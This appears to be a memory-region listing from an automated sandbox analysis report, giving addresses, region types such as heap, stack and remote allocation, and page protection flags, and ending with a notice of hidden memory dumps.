trusted library allocation
|
page read and write
|
||
55F0000
|
trusted library allocation
|
page read and write
|
||
4EA0000
|
trusted library allocation
|
page read and write
|
||
6B70000
|
trusted library allocation
|
page execute and read and write
|
||
BE0000
|
heap
|
page read and write
|
||
96DE000
|
stack
|
page read and write
|
||
4419000
|
trusted library allocation
|
page read and write
|
||
3FD2000
|
trusted library allocation
|
page read and write
|
||
4FD0000
|
trusted library allocation
|
page read and write
|
||
9960000
|
heap
|
page read and write
|
||
3036000
|
trusted library allocation
|
page read and write
|
||
C2A000
|
heap
|
page read and write
|
||
130D000
|
trusted library allocation
|
page execute and read and write
|
||
4CA0000
|
heap
|
page read and write
|
||
461C000
|
stack
|
page read and write
|
||
1680000
|
heap
|
page read and write
|
||
863000
|
trusted library allocation
|
page execute and read and write
|
||
2BF6000
|
trusted library allocation
|
page read and write
|
||
43EC000
|
trusted library allocation
|
page read and write
|
||
1395000
|
heap
|
page read and write
|
||
4A86000
|
trusted library allocation
|
page read and write
|
||
12AE000
|
stack
|
page read and write
|
||
10F7000
|
heap
|
page read and write
|
||
6DC0000
|
trusted library allocation
|
page read and write
|
||
B70000
|
trusted library allocation
|
page read and write
|
||
324B000
|
trusted library allocation
|
page read and write
|
||
C48000
|
heap
|
page read and write
|
||
1250000
|
trusted library allocation
|
page read and write
|
||
2C11000
|
trusted library allocation
|
page read and write
|
||
2E6B000
|
trusted library allocation
|
page read and write
|
||
6E8B000
|
trusted library allocation
|
page read and write
|
||
4126000
|
trusted library allocation
|
page read and write
|
||
6BE0000
|
trusted library allocation
|
page execute and read and write
|
||
4065000
|
trusted library allocation
|
page read and write
|
||
EF0000
|
trusted library allocation
|
page execute and read and write
|
||
2B98000
|
trusted library allocation
|
page read and write
|
||
312E000
|
trusted library allocation
|
page read and write
|
||
3059000
|
trusted library allocation
|
page read and write
|
||
3064000
|
trusted library allocation
|
page read and write
|
||
72A000
|
stack
|
page read and write
|
||
3E38000
|
trusted library allocation
|
page read and write
|
||
3245000
|
trusted library allocation
|
page read and write
|
||
5060000
|
heap
|
page execute and read and write
|
||
3080000
|
heap
|
page execute and read and write
|
||
4AB0000
|
trusted library allocation
|
page read and write
|
||
6DA6000
|
trusted library allocation
|
page read and write
|
||
2901000
|
trusted library allocation
|
page read and write
|
||
DB7000
|
heap
|
page read and write
|
||
C1E000
|
stack
|
page read and write
|
||
5050000
|
heap
|
page read and write
|
||
4133000
|
trusted library allocation
|
page read and write
|
||
4B40000
|
heap
|
page read and write
|
||
3028000
|
trusted library allocation
|
page read and write
|
||
7130000
|
heap
|
page read and write
|
||
6C9E000
|
stack
|
page read and write
|
||
400000
|
remote allocation
|
page execute and read and write
|
||
6C60000
|
trusted library allocation
|
page read and write
|
||
6940000
|
trusted library allocation
|
page read and write
|
||
4F4E000
|
stack
|
page read and write
|
||
43F8000
|
trusted library allocation
|
page read and write
|
||
895000
|
heap
|
page read and write
|
||
361F000
|
trusted library allocation
|
page read and write
|
||
B3E000
|
stack
|
page read and write
|
||
440000
|
remote allocation
|
page execute and read and write
|
||
2F6D000
|
trusted library allocation
|
page read and write
|
||
A33000
|
heap
|
page read and write
|
||
9C0000
|
heap
|
page read and write
|
||
4AB5000
|
trusted library allocation
|
page read and write
|
||
43A1000
|
trusted library allocation
|
page read and write
|
||
410E000
|
trusted library allocation
|
page read and write
|
||
4256000
|
trusted library allocation
|
page read and write
|
||
4EF0000
|
trusted library allocation
|
page read and write
|
||
30BC000
|
trusted library allocation
|
page read and write
|
||
4A92000
|
trusted library allocation
|
page read and write
|
||
416F000
|
trusted library allocation
|
page read and write
|
||
4C9B000
|
stack
|
page read and write
|
||
2930000
|
trusted library allocation
|
page read and write
|
||
3806000
|
trusted library allocation
|
page read and write
|
||
40C2000
|
trusted library allocation
|
page read and write
|
||
7EE000
|
stack
|
page read and write
|
||
3198000
|
trusted library allocation
|
page read and write
|
||
3662000
|
trusted library allocation
|
page read and write
|
||
6DF0000
|
trusted library allocation
|
page execute and read and write
|
||
A43E000
|
stack
|
page read and write
|
||
5620000
|
heap
|
page read and write
|
||
A0EE000
|
stack
|
page read and write
|
||
6E80000
|
trusted library allocation
|
page read and write
|
||
6DB0000
|
trusted library allocation
|
page execute and read and write
|
||
3379000
|
trusted library allocation
|
page read and write
|
||
6C90000
|
trusted library allocation
|
page execute and read and write
|
||
55B6000
|
trusted library allocation
|
page read and write
|
||
419B000
|
trusted library allocation
|
page read and write
|
||
6F90000
|
trusted library section
|
page read and write
|
||
BC0000
|
trusted library allocation
|
page read and write
|
||
4412000
|
trusted library allocation
|
page read and write
|
||
4286000
|
trusted library allocation
|
page read and write
|
||
44B0000
|
trusted library allocation
|
page read and write
|
||
1260000
|
trusted library allocation
|
page read and write
|
||
86D000
|
trusted library allocation
|
page execute and read and write
|
||
783E000
|
stack
|
page read and write
|
||
50F000
|
unkown
|
page read and write
|
||
3230000
|
heap
|
page read and write
|
||
5460000
|
trusted library allocation
|
page read and write
|
||
259B000
|
trusted library allocation
|
page read and write
|
||
4424000
|
trusted library allocation
|
page read and write
|
||
2F8F000
|
trusted library allocation
|
page read and write
|
||
55E2000
|
trusted library allocation
|
page read and write
|
||
87D000
|
trusted library allocation
|
page execute and read and write
|
||
1106000
|
trusted library allocation
|
page execute and read and write
|
||
4104000
|
trusted library allocation
|
page read and write
|
||
A87C000
|
stack
|
page read and write
|
||
2950000
|
heap
|
page read and write
|
||
84E000
|
stack
|
page read and write
|
||
882000
|
trusted library allocation
|
page read and write
|
||
3FA7000
|
trusted library allocation
|
page read and write
|
||
67ED000
|
stack
|
page read and write
|
||
6F00000
|
trusted library allocation
|
page read and write
|
||
DB0000
|
heap
|
page read and write
|
||
A6C0000
|
heap
|
page read and write
|
||
4B4C000
|
stack
|
page read and write
|
||
BFA000
|
stack
|
page read and write
|
||
1018000
|
trusted library allocation
|
page read and write
|
||
10E0000
|
heap
|
page read and write
|
||
2912000
|
trusted library allocation
|
page read and write
|
||
6F50000
|
heap
|
page read and write
|
||
1310000
|
heap
|
page read and write
|
||
850000
|
trusted library allocation
|
page read and write
|
||
13FC000
|
heap
|
page read and write
|
||
2410000
|
trusted library allocation
|
page read and write
|
||
327C000
|
trusted library allocation
|
page read and write
|
||
40FD000
|
trusted library allocation
|
page read and write
|
||
2C0A000
|
trusted library allocation
|
page read and write
|
||
3FF1000
|
trusted library allocation
|
page read and write
|
||
67D0000
|
heap
|
page read and write
|
||
A57E000
|
stack
|
page read and write
|
||
5073000
|
heap
|
page read and write
|
||
53C3000
|
heap
|
page read and write
|
||
6ED0000
|
trusted library allocation
|
page read and write
|
||
2E0B000
|
trusted library allocation
|
page read and write
|
||
40AD000
|
trusted library allocation
|
page read and write
|
||
419F000
|
trusted library allocation
|
page read and write
|
||
42D000
|
remote allocation
|
page execute and read and write
|
||
447A000
|
trusted library allocation
|
page read and write
|
||
3F95000
|
trusted library allocation
|
page read and write
|
||
15EF000
|
stack
|
page read and write
|
||
A240000
|
heap
|
page read and write
|
||
3DD9000
|
trusted library allocation
|
page read and write
|
||
BA7000
|
trusted library allocation
|
page execute and read and write
|
||
4243000
|
trusted library allocation
|
page read and write
|
||
53BA000
|
trusted library allocation
|
page read and write
|
||
A1F1000
|
trusted library allocation
|
page read and write
|
||
4156000
|
trusted library allocation
|
page read and write
|
||
6B40000
|
trusted library allocation
|
page execute and read and write
|
||
69AE000
|
stack
|
page read and write
|
||
AF7000
|
stack
|
page read and write
|
||
4FB5000
|
heap
|
page read and write
|
||
4BB0000
|
trusted library section
|
page readonly
|
||
4FD0000
|
heap
|
page read and write
|
||
6960000
|
trusted library allocation
|
page read and write
|
||
A30000
|
heap
|
page read and write
|
||
313A000
|
trusted library allocation
|
page read and write
|
||
6C10000
|
trusted library allocation
|
page read and write
|
||
860000
|
trusted library allocation
|
page read and write
|
||
2E25000
|
trusted library allocation
|
page read and write
|
||
6C00000
|
trusted library allocation
|
page read and write
|
||
436000
|
remote allocation
|
page execute and read and write
|
||
9B9E000
|
stack
|
page read and write
|
||
6D8E000
|
stack
|
page read and write
|
||
562E000
|
stack
|
page read and write
|
||
B73000
|
trusted library allocation
|
page execute and read and write
|
||
6700000
|
heap
|
page read and write
|
||
338A000
|
trusted library allocation
|
page read and write
|
||
683E000
|
stack
|
page read and write
|
||
709D000
|
stack
|
page read and write
|
||
3250000
|
trusted library allocation
|
page read and write
|
||
4B52000
|
trusted library allocation
|
page read and write
|
||
3136000
|
trusted library allocation
|
page read and write
|
||
3104000
|
trusted library allocation
|
page read and write
|
||
4B50000
|
trusted library allocation
|
page read and write
|
||
2906000
|
trusted library allocation
|
page read and write
|
||
1112000
|
trusted library allocation
|
page read and write
|
||
95DF000
|
stack
|
page read and write
|
||
305F000
|
stack
|
page read and write
|
||
377E000
|
trusted library allocation
|
page read and write
|
||
4F10000
|
trusted library allocation
|
page read and write
|
||
A47D000
|
stack
|
page read and write
|
||
10DD000
|
trusted library allocation
|
page execute and read and write
|
||
31F3000
|
trusted library allocation
|
page read and write
|
||
4AA0000
|
trusted library allocation
|
page read and write
|
||
5205000
|
heap
|
page read and write
|
||
10F0000
|
trusted library allocation
|
page read and write
|
||
4280000
|
trusted library allocation
|
page read and write
|
||
12CE000
|
stack
|
page read and write
|
||
13F1000
|
heap
|
page read and write
|
||
413A000
|
trusted library allocation
|
page read and write
|
||
42E5000
|
trusted library allocation
|
page read and write
|
||
422E000
|
trusted library allocation
|
page read and write
|
||
886000
|
trusted library allocation
|
page execute and read and write
|
||
6BF0000
|
trusted library allocation
|
page read and write
|
||
130C000
|
stack
|
page read and write
|
||
88A000
|
trusted library allocation
|
page execute and read and write
|
||
6B30000
|
trusted library allocation
|
page read and write
|
||
4548000
|
trusted library allocation
|
page read and write
|
||
6C40000
|
trusted library allocation
|
page execute and read and write
|
||
379E000
|
trusted library allocation
|
page read and write
|
||
3DD3000
|
trusted library allocation
|
page read and write
|
||
1355000
|
heap
|
page read and write
|
||
2414000
|
trusted library allocation
|
page read and write
|
||
BC0000
|
heap
|
page read and write
|
||
4117000
|
trusted library allocation
|
page read and write
|
||
A13D000
|
stack
|
page read and write
|
||
66AE000
|
stack
|
page read and write
|
||
1200000
|
heap
|
page read and write
|
||
3C0000
|
heap
|
page read and write
|
||
10D4000
|
trusted library allocation
|
page read and write
|
||
B83000
|
trusted library allocation
|
page read and write
|
||
71E2000
|
trusted library allocation
|
page read and write
|
||
314A000
|
trusted library allocation
|
page read and write
|
||
4405000
|
trusted library allocation
|
page read and write
|
||
981E000
|
stack
|
page read and write
|
||
2F94000
|
trusted library allocation
|
page read and write
|
||
6952000
|
trusted library allocation
|
page read and write
|
||
15FB000
|
trusted library allocation
|
page execute and read and write
|
||
4284000
|
trusted library allocation
|
page read and write
|
||
A141000
|
heap
|
page read and write
|
||
2E5A000
|
trusted library allocation
|
page read and write
|
||
55CE000
|
trusted library allocation
|
page read and write
|
||
3065000
|
trusted library allocation
|
page read and write
|
||
5950000
|
trusted library allocation
|
page execute and read and write
|
||
516C000
|
stack
|
page read and write
|
||
2940000
|
heap
|
page execute and read and write
|
||
A6BE000
|
stack
|
page read and write
|
||
6C0E000
|
stack
|
page read and write
|
||
772E000
|
stack
|
page read and write
|
||
450D000
|
trusted library allocation
|
page read and write
|
||
302B000
|
trusted library allocation
|
page read and write
|
||
3276000
|
trusted library allocation
|
page read and write
|
||
69EF000
|
stack
|
page read and write
|
||
131A000
|
trusted library allocation
|
page execute and read and write
|
||
15F0000
|
trusted library allocation
|
page read and write
|
||
880000
|
trusted library allocation
|
page read and write
|
||
B8D000
|
trusted library allocation
|
page execute and read and write
|
||
140000
|
heap
|
page read and write
|
||
402000
|
remote allocation
|
page execute and read and write
|
||
2C30000
|
heap
|
page execute and read and write
|
||
C64000
|
heap
|
page read and write
|
||
43C000
|
remote allocation
|
page execute and read and write
|
||
4FB0000
|
heap
|
page read and write
|
||
A0AE000
|
stack
|
page read and write
|
||
3E1E000
|
trusted library allocation
|
page read and write
|
||
3241000
|
trusted library allocation
|
page read and write
|
||
54E000
|
stack
|
page read and write
|
||
253E000
|
stack
|
page read and write
|
||
309C000
|
trusted library allocation
|
page read and write
|
||
971E000
|
stack
|
page read and write
|
||
5090000
|
trusted library allocation
|
page read and write
|
||
1310000
|
trusted library allocation
|
page read and write
|
||
7A0000
|
heap
|
page read and write
|
||
682E000
|
stack
|
page read and write
|
||
4A6B000
|
trusted library allocation
|
page read and write
|
||
141A000
|
heap
|
page read and write
|
||
290D000
|
trusted library allocation
|
page read and write
|
||
55B0000
|
trusted library allocation
|
page read and write
|
||
51F0000
|
heap
|
page read and write
|
||
6B60000
|
trusted library allocation
|
page execute and read and write
|
||
30DE000
|
trusted library allocation
|
page read and write
|
||
3DB1000
|
trusted library allocation
|
page read and write
|
||
692000
|
unkown
|
page readonly
|
||
2C16000
|
trusted library allocation
|
page read and write
|
||
2B96000
|
trusted library allocation
|
page read and write
|
||
3142000
|
trusted library allocation
|
page read and write
|
||
3E3A000
|
trusted library allocation
|
page read and write
|
||
55D6000
|
trusted library allocation
|
page read and write
|
||
36A4000
|
trusted library allocation
|
page read and write
|
||
B60000
|
trusted library allocation
|
page read and write
|
||
70DE000
|
stack
|
page read and write
|
||
3A51000
|
trusted library allocation
|
page read and write
|
||
A9BE000
|
stack
|
page read and write
|
||
423000
|
remote allocation
|
page execute and read and write
|
||
41EB000
|
trusted library allocation
|
page read and write
|
||
42D0000
|
trusted library allocation
|
page read and write
|
||
41CB000
|
trusted library allocation
|
page read and write
|
||
6BD0000
|
trusted library allocation
|
page read and write
|
||
9A2000
|
trusted library allocation
|
page read and write
|
||
660D000
|
heap
|
page read and write
|
||
2F5E000
|
trusted library allocation
|
page read and write
|
||
41D1000
|
trusted library allocation
|
page read and write
|
||
4119000
|
trusted library allocation
|
page read and write
|
||
65D3000
|
heap
|
page read and write
|
||
455F000
|
trusted library allocation
|
page read and write
|
||
4EF2000
|
trusted library allocation
|
page read and write
|
||
1102000
|
trusted library allocation
|
page read and write
|
||
6EE7000
|
trusted library allocation
|
page read and write
|
||
418C000
|
trusted library allocation
|
page read and write
|
||
3023000
|
trusted library allocation
|
page read and write
|
||
538F000
|
stack
|
page read and write
|
||
1117000
|
trusted library allocation
|
page execute and read and write
|
||
313E000
|
trusted library allocation
|
page read and write
|
||
9CDE000
|
stack
|
page read and write
|
||
9D000
|
stack
|
page read and write
|
||
3E2B000
|
trusted library allocation
|
page read and write
|
||
4F9D000
|
stack
|
page read and write
|
||
2AAB000
|
trusted library allocation
|
page read and write
|
||
333E000
|
trusted library allocation
|
page read and write
|
||
4201000
|
trusted library allocation
|
page read and write
|
||
6DD0000
|
trusted library allocation
|
page execute and read and write
|
||
4091000
|
trusted library allocation
|
page read and write
|
||
344E000
|
stack
|
page read and write
|
||
5623000
|
heap
|
page read and write
|
||
3301000
|
trusted library allocation
|
page read and write
|
||
3146000
|
trusted library allocation
|
page read and write
|
||
4AC0000
|
trusted library allocation
|
page read and write
|
||
16B0000
|
heap
|
page read and write
|
||
2430000
|
heap
|
page read and write
|
||
4A7E000
|
trusted library allocation
|
page read and write
|
||
3243000
|
trusted library allocation
|
page read and write
|
||
1270000
|
trusted library allocation
|
page read and write
|
||
6C20000
|
trusted library allocation
|
page read and write
|
||
4522000
|
trusted library allocation
|
page read and write
|
||
2DA0000
|
heap
|
page read and write
|
||
4A60000
|
trusted library allocation
|
page read and write
|
||
2A51000
|
trusted library allocation
|
page read and write
|
||
BAB000
|
trusted library allocation
|
page execute and read and write
|
||
6615000
|
heap
|
page read and write
|
||
2BEE000
|
stack
|
page read and write
|
||
D80000
|
heap
|
page read and write
|
||
2C20000
|
trusted library allocation
|
page read and write
|
||
6C50000
|
trusted library allocation
|
page read and write
|
||
12F3000
|
trusted library allocation
|
page execute and read and write
|
||
2EF9000
|
stack
|
page read and write
|
||
DA000
|
stack
|
page read and write
|
||
1100000
|
trusted library allocation
|
page read and write
|
||
4B7B000
|
trusted library allocation
|
page read and write
|
||
C2E000
|
heap
|
page read and write
|
||
3330000
|
heap
|
page read and write
|
||
695A000
|
trusted library allocation
|
page read and write
|
||
28E0000
|
trusted library allocation
|
page read and write
|
||
10D0000
|
trusted library allocation
|
page read and write
|
||
3E17000
|
trusted library allocation
|
page read and write
|
||
870000
|
trusted library allocation
|
page read and write
|
||
10FD000
|
trusted library allocation
|
page execute and read and write
|
||
2C1D000
|
trusted library allocation
|
page read and write
|
||
4535000
|
trusted library allocation
|
page read and write
|
||
3060000
|
trusted library allocation
|
page read and write
|
||
12F0000
|
trusted library allocation
|
page read and write
|
||
53B6000
|
trusted library allocation
|
page read and write
|
||
1670000
|
trusted library allocation
|
page read and write
|
||
4430000
|
trusted library allocation
|
page read and write
|
||
411C000
|
trusted library allocation
|
page read and write
|
||
7730000
|
trusted library section
|
page read and write
|
||
42B000
|
remote allocation
|
page execute and read and write
|
||
3E2F000
|
trusted library allocation
|
page read and write
|
||
30A9000
|
trusted library allocation
|
page read and write
|
||
5098000
|
trusted library allocation
|
page read and write
|
||
441000
|
remote allocation
|
page execute and read and write
|
||
2416000
|
trusted library allocation
|
page read and write
|
||
3032000
|
trusted library allocation
|
page read and write
|
||
410D000
|
trusted library allocation
|
page read and write
|
||
1260000
|
heap
|
page read and write
|
||
12FD000
|
trusted library allocation
|
page execute and read and write
|
||
3070000
|
trusted library allocation
|
page read and write
|
||
3108000
|
trusted library allocation
|
page read and write
|
||
9FAE000
|
stack
|
page read and write
|
||
4145000
|
trusted library allocation
|
page read and write
|
||
DA0000
|
trusted library allocation
|
page read and write
|
||
1320000
|
heap
|
page read and write
|
||
9BDE000
|
stack
|
page read and write
|
||
2E29000
|
trusted library allocation
|
page read and write
|
There are 717 hidden memdumps, click here to show them.